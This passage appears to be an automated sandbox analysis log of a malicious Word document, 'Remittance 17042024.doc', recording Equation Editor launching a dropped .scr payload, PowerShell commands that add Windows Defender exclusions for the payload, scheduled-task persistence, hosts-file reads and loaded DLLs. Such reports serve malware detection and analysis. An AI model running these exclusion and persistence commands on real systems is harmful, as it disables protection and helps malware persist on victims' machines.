                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeFile read: C:\Windows\System32\drivers\etc\hosts
                    Source: Remittance 17042024.docReversingLabs: Detection: 44%
                    Source: Remittance 17042024.docVirustotal: Detection: 45%
                    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp"
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"
                    Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {E15E873E-836C-4FC1-A12D-690BEBE78D2E} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\egFUHsL.exe C:\Users\user\AppData\Roaming\egFUHsL.exe
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp9A3D.tmp"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Users\user\AppData\Roaming\egFUHsL.exe "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp871B.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrProcess created: C:\Users\user\AppData\Roaming\dzoihohj75439.scr "C:\Users\user\AppData\Roaming\dzoihohj75439.scr"Jump to behavior
                    Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\egFUHsL.exe C:\Users\user\AppData\Roaming\egFUHsL.exe
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\egFUHsL" /XML "C:\Users\user\AppData\Local\Temp\tmp9A3D.tmp"
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeProcess created: C:\Users\user\AppData\Roaming\egFUHsL.exe "C:\Users\user\AppData\Roaming\egFUHsL.exe"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: ktmw32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: wow64win.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: wbemcomn2.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: rpcrtremote.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: ntdsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: credssp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\dzoihohj75439.scrSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dll
                    Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: wow64win.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: wow64cpu.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: bcrypt.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\egFUHsL.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
